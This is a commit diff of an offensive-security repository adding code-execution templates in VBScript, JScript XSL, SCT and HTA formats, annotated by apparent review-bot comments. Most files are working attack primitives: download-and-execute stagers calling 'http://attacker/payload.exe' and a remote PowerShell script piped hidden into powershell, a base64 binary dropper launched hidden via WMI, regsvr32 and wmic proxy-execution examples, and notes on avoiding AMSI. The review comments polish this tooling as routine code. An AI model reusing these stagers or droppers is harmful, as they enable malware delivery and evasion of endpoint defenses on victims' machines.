Added code-exec-templates and some additions to rogue-dot-net

This commit is contained in:
mgeeky
2020-05-07 01:42:52 +02:00
parent b7c7da7b4e
commit 8b03b5ba40
14 changed files with 806 additions and 723 deletions

View File

@ -1,67 +1,71 @@
### A small collection of unobfuscated code-execution primitives in different languages
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
- `wscript.exe` - For general scripts execution. **This one loads AMSI**
---
#### VBScript
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
---
#### JScript
---
#### XSL
XSL files can be executed in the following ways:
- Using `wmic.exe`:
```
wmic os get /format:"jscript-xslt-template.xsl"
```
Templates:
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
---
#### COM Scriptlets
Sample code execution with `regsvr32` can be following:
```
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
```
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
---
#### HTA
HTA files are HTML Applications
### A small collection of unobfuscated code-execution primitives in different languages
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
- `wscript.exe` - For general scripts execution. **This one loads AMSI**
---
#### VBScript
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
- **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn`
- **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it.
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
---
#### JScript
---
#### XSL
XSL files can be executed in the following ways:
- Using `wmic.exe`:
```
wmic os get /format:"jscript-xslt-template.xsl"
```
Templates:
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
---
#### COM Scriptlets
Sample code execution with `regsvr32` can be following:
```
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
```
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
---
#### HTA
HTA files are HTML Applications
- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_
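Review bot: the new entry `download-powershell-and-exec-via-stdin` is listed without the `.vbs` extension that every other VBScript entry in the list carries; add it if the file is a `.vbs` script, since readers use these names to find the files. The rewrite also keeps the pre-existing typos intact ("useulf" should be "useful", "scritplets" should be "scriptlets", "JSCript" should be "JScript"), mixes "Powershell"/"powershell" spellings, and the `#### JScript` section is still empty with no templates listed under it.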

View File

@ -1,38 +1,36 @@
'
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
downloadURL = "http://attacker/payload.exe"
saveAs = "%TEMP%\foo.exe"
parameters = ""
Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveAs)
' STEP 1: Download File
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
xhr.Open "GET", downloadURL, False
xhr.Send
' STEP 2: Save binary file
If xhr.Status = 200 Then
With CreateObject("Adodb.Stream")
.Open
.Type = 1
.write xhr.responseBody
.savetofile out, 2
End With
' STEP 3: Execute file
cmd = out & " " & parameters
MsgBox cmd
sh.Run cmd, 0, False
End If
Set sh = Nothing
'
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
downloadURL = "http://attacker/payload.exe"
saveAs = "%TEMP%\foo.exe"
parameters = ""
Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveAs)
' STEP 1: Download File
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
xhr.Open "GET", downloadURL, False
xhr.Send
' STEP 2: Save binary file
If xhr.Status = 200 Then
With CreateObject("Adodb.Stream")
.Open
.Type = 1
.write xhr.responseBody
.savetofile out, 2
End With
' STEP 3: Execute file
cmd = out & " " & parameters
sh.Run cmd, 0, False
End If
Set sh = Nothing
Set xhr = Nothing
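Review bot: dropping `MsgBox cmd` from the old version is a behaviour change (the script no longer stops on a visible dialog before `sh.Run`), so it deserves a mention in the commit message rather than being folded into "some additions". The only other change is the added `Set xhr = Nothing`; while here, the header comment should state that `.savetofile out, 2` overwrites any existing file at the expanded `%TEMP%\foo.exe` path without asking.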

View File

@ -0,0 +1,34 @@
'
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
scriptURL = "http://attacker/script.ps1"
launcher = "powershell -nop -w hid -Command -"
Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", scriptURL, False
xhr.Send
Function bin2a(Binary)
Dim I,S
For I = 1 to LenB(Binary)
S = S & Chr(AscB(MidB(Binary,I,1)))
Next
bin2a = S
End Function
If xhr.Status = 200 Then
With CreateObject("WScript.Shell")
With .Exec(launcher)
.StdIn.WriteLine bin2a(xhr.responseBody)
.StdIn.WriteBlankLines 1
.Terminate
End With
End With
End If
Set xhr = Nothing
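Review bot: the header comment ("downloading a binary file from the URL, saving it to the local filesystem and then launching") is copied from download-file-and-exec.vbs and does not describe this script, which fetches `scriptURL` and feeds the response to the launcher's StdIn without writing to disk; rewrite it. `bin2a` also rebuilds the body one byte at a time with `Chr(AscB(MidB(...)))`, so it only round-trips ASCII content; document that assumption in the function's comment.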

View File

@ -0,0 +1,47 @@
'
' Example of dropping an embedded, base64 encoded binary file to the disk,
' decoding it and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
saveFileAs = "%TEMP%\foo.exe"
launchParameters = ""
' =============================================================
fileBuffer = "<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>"
' =============================================================
Function Base64Decode(ByVal vCode)
Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = oNode.nodeTypedValue
Set oNode = Nothing
End Function
Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveFileAs)
With CreateObject("Adodb.Stream")
.Open
.Type = 1
.write Base64Decode(fileBuffer)
.savetofile out, 2
End With
computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_
conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
command = out & " " & launchParameters
proc.Create command, Null, conf, intProcessID
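Review bot: `proc.Create command, Null, conf, intProcessID` discards the method's return value and `intProcessID` is never read afterwards, so a failed launch (for instance when the `<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>` placeholder is left in `fileBuffer` and `Base64Decode` yields an empty file) is silent; capture and check the result. The WMI launch block from `computer = "."` down to `proc.Create` also duplicates wmi-exec-command.vbs line for line, and `sh` is never released with `Set sh = Nothing` the way the sibling download script does.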

View File

@ -1,15 +1,15 @@
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
// Hello world
var shell = new ActiveXObject("WScript.Shell");
shell.Popup("Hello world from JScript XSL!");
]]> </ms:script>
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
// Hello world
var shell = new ActiveXObject("WScript.Shell");
shell.Popup("Hello world from JScript XSL!");
]]> </ms:script>
</stylesheet>
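Review bot: the old and new sides of this hunk are identical (`@ -1,15 +1,15 @@` with no visible content change), so this is a line-ending or trailing-whitespace rewrite, and the same holds for most of the remaining files in the commit. Add a `.gitattributes` (for example `* text=auto`, or `*.vbs text eol=crlf` where CRLF is required by the Windows consumers) so such churn stops appearing as whole-file diffs that hide the real changes.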

View File

@ -1,20 +1,20 @@
'
' This script uses WMI class' Win32_Process static method Create to
' execute given command in a hidden window (ShowWindow = 12).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_
conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
'
' This script uses WMI class' Win32_Process static method Create to
' execute given command in a hidden window (ShowWindow = 12).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_
conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
proc.Create command, Null, conf, intProcessID
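Review bot: the last line, `proc.Create command, Null, conf, intProcessID`, ignores the method's return value and `intProcessID` is written but never read, so the script cannot tell whether the process was created. Assign the result (`ret = proc.Create(command, Null, conf, intProcessID)`) and report a nonzero value. The header's "(ShowWindow = 12)" should also say which constant that number is meant to represent, since the magic value is repeated in drop-binary-file-and-launch.vbs.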

View File

@ -1,13 +1,13 @@
'
' This script uses classic WScript.Shell Run method to
' execute given command in a hidden window (second param = 0)
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
With CreateObject("WScript.Shell")
.Run command, 0, False
End With
'
' This script uses classic WScript.Shell Run method to
' execute given command in a hidden window (second param = 0)
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
With CreateObject("WScript.Shell")
.Run command, 0, False
End With
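Review bot: the header comment explains the second `Run` argument ("second param = 0") but not the third; `False` there means the script does not wait for the launched process, which is why the `With` block ends while the command is still running. One more line in the comment would make the template self-explanatory.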

View File

@ -1,15 +1,15 @@
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Foo"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var command = "notepad.exe";
var r = new ActiveXObject("WScript.Shell").Run(command);
]]>
</script>
</registration>
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Foo"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var command = "notepad.exe";
var r = new ActiveXObject("WScript.Shell").Run(command);
]]>
</script>
</registration>
</scriptlet>
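Review bot: `var r = new ActiveXObject("WScript.Shell").Run(command);` stores the return value in `r` and never uses it; drop the assignment, or keep it only with a comment explaining that `Run` returns an exit code only when its wait argument is set, which this call does not pass. The `progid="Foo"` and fixed `classid` are placeholders and should be marked as such in a comment, as the README presents this file as a template.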

View File

@ -1,14 +1,14 @@
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var command = "notepad";
var r = new ActiveXObject("WScript.Shell").Run(command);
]]> </ms:script>
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var command = "notepad";
var r = new ActiveXObject("WScript.Shell").Run(command);
]]> </ms:script>
</stylesheet>
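Review bot: `var command = "notepad";` differs from the `"notepad.exe"` used in every other template in this commit; use the same value so the templates behave identically when swapped in, and so a reader grepping for the test command finds all of them. As in the `.sct` file, `r` is assigned and never read.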

View File

@ -1,14 +1,14 @@
<html>
<head>
<script language="VBScript">
Sub foo
command = "notepad.exe"
Set objShell = CreateObject("Wscript.Shell")
objShell.Run command
End Sub
foo()
</script>
</head>
<body>
</body>
<html>
<head>
<script language="VBScript">
Sub foo
command = "notepad.exe"
Set objShell = CreateObject("Wscript.Shell")
objShell.Run command
End Sub
foo()
</script>
</head>
<body>
</body>
</html>
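Review bot: the HTA has no `<title>` and no `<hta:application>` element, so it opens as an untitled window with default application settings; since the README calls this file "a backbone", the skeleton should carry those two elements with a comment on which attributes a reader is expected to fill in. `Sub foo` is also a non-descriptive name for the only procedure in the template.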

View File

@ -1,19 +1,19 @@
'
' This script uses classic WScript.Shell Exec method to
' execute given command in a hidden window via StdIn passed to a dedicated
' launcher command (powershell.exe in this example).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
launcher = "powershell -nop -w hid -Command -"
With CreateObject("WScript.Shell")
With .Exec(launcher)
.StdIn.WriteLine command
.StdIn.WriteBlankLines 1
.Terminate
End With
End With
'
' This script uses classic WScript.Shell Exec method to
' execute given command in a hidden window via StdIn passed to a dedicated
' launcher command (powershell.exe in this example).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
launcher = "powershell -nop -w hid -Command -"
With CreateObject("WScript.Shell")
With .Exec(launcher)
.StdIn.WriteLine command
.StdIn.WriteBlankLines 1
.Terminate
End With
End With
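Review bot: the header says the script executes the command "in a hidden window", but `WScript.Shell.Exec` takes no window-style argument; the hiding comes entirely from the `-w hid` switch in the `launcher` string on the line below `command`, so the comment should attribute it to the launcher (the same applies to the launcher string in download-powershell-and-exec-via-stdin). Also `.Terminate` is called immediately after `.StdIn.WriteBlankLines 1` with no wait; document that the launcher is expected to have consumed StdIn by then, since that ordering is the non-obvious part of the template.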